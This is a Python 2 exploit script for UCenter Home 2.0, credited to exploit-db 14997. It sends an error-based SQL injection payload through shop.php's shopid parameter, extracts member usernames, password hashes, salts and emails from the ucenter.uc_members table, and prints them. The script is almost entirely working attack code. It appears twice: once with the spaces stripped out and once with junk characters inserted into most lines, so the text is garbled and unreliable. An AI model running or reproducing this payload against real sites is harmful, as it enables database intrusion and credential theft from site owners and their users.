#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl5 g5 ]+ b5 h) ]) G6 h2 L* O
, e! e- Q- K8 ^5 l4 X: K8 B& l. S6 m
#!/usr/bin/env python
- B9 b) p% ?( m3 m0 W8 h$ z+ O& A 0 ?7 c0 D% r+ \9 `+ X2 w- N
import sys
2 Q- U+ Q4 `" q: y2 t9 Y0 b9 o! \import urllib2
3 N9 D6 p. |2 timport re
, n. R4 K/ ]3 n$ t; n& \" A+ t 8 T6 h+ W6 R$ i" ?
def info(): ( j; w+ a/ T* I1 ^. s: g
print 'From:http://www.exploit-db.com/exploits/14997/'
! r) {0 o- E) p$ L* ^ print 'http://www.hake.cc/Web_loudong/' % R2 Q9 v) U, Q6 L0 W
print 'changed:qiaoy' . I( S7 s+ T, ?# k1 q b6 c( W
print 'exp:' * _6 T4 j# W/ a2 c, ~8 i
print ' ./UCenter_Home_2.0.py site'
( j- x+ m0 L( \$ t7 T1 r" ^7 n ' U1 y% [5 X2 u/ D4 Q
def main():
' t* |9 N9 ~) H/ u& L4 r; F! P6 N6 e if len(sys.argv) != 2: * Y7 Y+ r4 Q! X b6 N: O
info() + w+ f9 v3 |% E, v8 y
else: 5 j" Y' }# g: h- f/ q
site = sys.argv[1] 6 y3 x. v0 e% V/ o6 b' @6 m
if site[0:7] == 'http://': ; V% Z5 r% j) L, R4 i- a* }
sitesite =site . c' A s) m+ l& p2 |# l
elif site[0:8] == 'https://':
' Q+ i( S: _2 o' L7 r/ u H8 w sitesite = site
% u% a1 j+ a* G; j4 o" V* U% }9 p* D else: , O; C( }6 m* m; s/ h. }
site = 'http://'+site
; c7 D1 w3 y5 d! F4 x4 A try:
& q8 [! ?% r( z) z5 Q6 m; j url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
" I3 `7 @. ^' Z6 I, m% ~5 g$ G; N Value = urllib2.urlopen(url).read() 5 w* U9 \9 \0 H
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
& H) Q! u5 A7 E* | hacked = Msg.split(':') $ u1 t% i6 r, Y, F& w
print 'Name: '+hacked[1]
3 }- K# Y/ G W5 f; S b6 n print 'Passwd: '+hacked[2]
* V$ a7 J3 O; J# J1 t# ^- @ print 'salt: '+hacked[3] , `3 _% }+ V. _% w9 _; o
print 'email: '+hacked[4] $ A( o& w4 t! E& h. x
except:
i& J ]' `8 z+ e4 L' m1 Z print 'Sorry,I can\'t work............'
* {( p. d8 |5 y; L* P# B
1 h$ m, G! R3 [8 O+ _, Cif __name__ == '__main__':
, t6 J% L5 ` @: s main() |